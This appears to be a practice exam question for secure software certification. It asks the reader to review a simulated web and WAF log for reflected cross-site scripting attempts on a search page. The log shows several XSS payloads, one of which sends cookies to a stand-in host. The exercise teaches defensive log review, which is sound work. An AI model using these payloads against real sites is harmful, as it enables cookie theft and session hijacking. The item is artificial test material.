Log Analysis PBQs: Certified Secure Software Lifecycle Professional (CSSLP)
Difficulty: easy. Question 1 of 3
You are a software security engineer reviewing web application security logs after the WAF dashboard flagged a spike in blocked requests. The application security team suspects reflected cross-site scripting (XSS) attempts targeting the search functionality. Review the application and WAF logs, flag all entries related to the XSS activity, and classify the incident for the security response team.
Objectives
- Review the application and WAF logs for cross-site scripting attack attempts
- Flag all entries showing XSS payloads in requests, including both blocked and bypassed attempts
- Classify the type of security incident
- Identify the attacker's source IP address
- Recommend the most appropriate immediate response action
Security Event Log
| Time | Severity | Source | Message |
|---|---|---|---|
| 14:00:00 | INFO | web | 200 GET /app/dashboard from 192.168.1.50 (authenticated user session) |
| 14:02:30 | INFO | web | 200 GET /app/search?q=quarterly+report from 192.168.1.50 |
| 14:05:00 | WARN | web | 400 GET /app/search?q=<script>alert('xss')</script> from 203.0.113.60 -- reflected XSS payload in search parameter |
| 14:05:05 | ALERT | firewall | WAF block: XSS signature matched in request from 203.0.113.60 to /app/search -- rule ID 941100 (Reflected XSS) |
| 14:06:30 | WARN | web | 400 GET /app/search?q=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E from 203.0.113.60 -- URL-encoded XSS payload |
| 14:06:35 | ALERT | firewall | WAF block: XSS signature matched in request from 203.0.113.60 to /app/search -- rule ID 941110 (HTML Event Handler XSS) |
| 14:07:00 | INFO | system | Application server health: CPU 34%, memory 62%, all services healthy |
| 14:08:15 | WARN | web | 200 GET /app/search?q=<svg/onload=fetch('https://evil.test/steal?c='+document.cookie)> from 203.0.113.60 -- XSS payload BYPASSED WAF (no rule match) |
| 14:09:00 | INFO | auth | Successful login: developer01 from 10.30.1.12 to staging environment |
| 14:10:00 | INFO | web | 200 GET /app/profile from 192.168.1.50 (authenticated user) |
| 14:11:30 | WARN | web | 200 GET /app/search?q=<iframe+src='javascript:alert(document.domain)'> from 203.0.113.60 -- XSS payload BYPASSED WAF (iframe variant) |
| 14:12:00 | INFO | system | Log aggregator: application log rotation completed for /var/log/webapp/access.log |
| 14:13:00 | ALERT | firewall | WAF rate limit: 203.0.113.60 exceeded 20 requests/min to /app/search endpoint -- temporary block applied (5 minutes) |
13 total entries.
Incident Analysis
Flag suspicious entries and answer the incident questions.

